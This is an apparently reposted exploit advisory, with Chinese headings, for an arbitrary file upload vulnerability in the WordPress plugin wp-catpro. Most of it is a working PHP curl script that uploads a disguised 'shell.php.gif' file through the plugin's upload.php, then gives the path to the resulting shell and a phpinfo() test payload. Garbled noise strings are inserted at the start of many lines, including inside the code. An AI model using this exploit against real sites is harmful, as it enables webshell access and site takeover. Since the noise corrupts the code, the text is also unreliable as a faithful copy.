WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
! h" H( E9 [& h5 C( |/ `- A: c#-----------------------------------------------------------------------
0 S5 j5 F% \5 \9 [! u4 a
作者  => Zikou-16
0 `- G" p0 {& X$ p8 y邮箱 => zikou16x@gmail.com
3 \+ S* P0 p, o3 n* _测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
/ ~+ `) H& Y( `8 o; `9 ^
. _. O9 I2 G+ i) o3 r#=> Exploit 信息:
------------------
5 Q' e, ?2 r" z; V: c1 _5 `6 Y) f# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
* I) l+ V: Z" F7 y------------------
# W0 y7 Z2 z/ I) C$ i
#=> Exploit
) }; K- o8 Z" ]# w* ~& _, q3 R-----------
<?php

& s. ^5 K, o- V1 }: _$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
( C8 ~* u8 F. [" lcurl_setopt($ch, CURLOPT_POST, true);
# K" |% ]" k. n/ S, l2 M  G- acurl_setopt($ch, CURLOPT_POSTFIELDS,
) {" O: H8 x* u9 Y8 W! F, ~array('Filedata'=>"@$uploadfile",
' Y% `! D7 i' T. r. S/ a! j'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
; [& z1 e+ `$ f4 n2 ocurl_close($ch);

' {7 v  U  u. g4 {& N  r; O/ nprint "$postResult";
6 Y6 x6 c* N. Z3 z
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
; r! s5 D0 g8 I  ?>
9 T1 _0 Q1 V9 }7 g5 \! ~0 ^3 i<?php
) |3 d& W3 o- M- A5 ]  Vphpinfo();
?>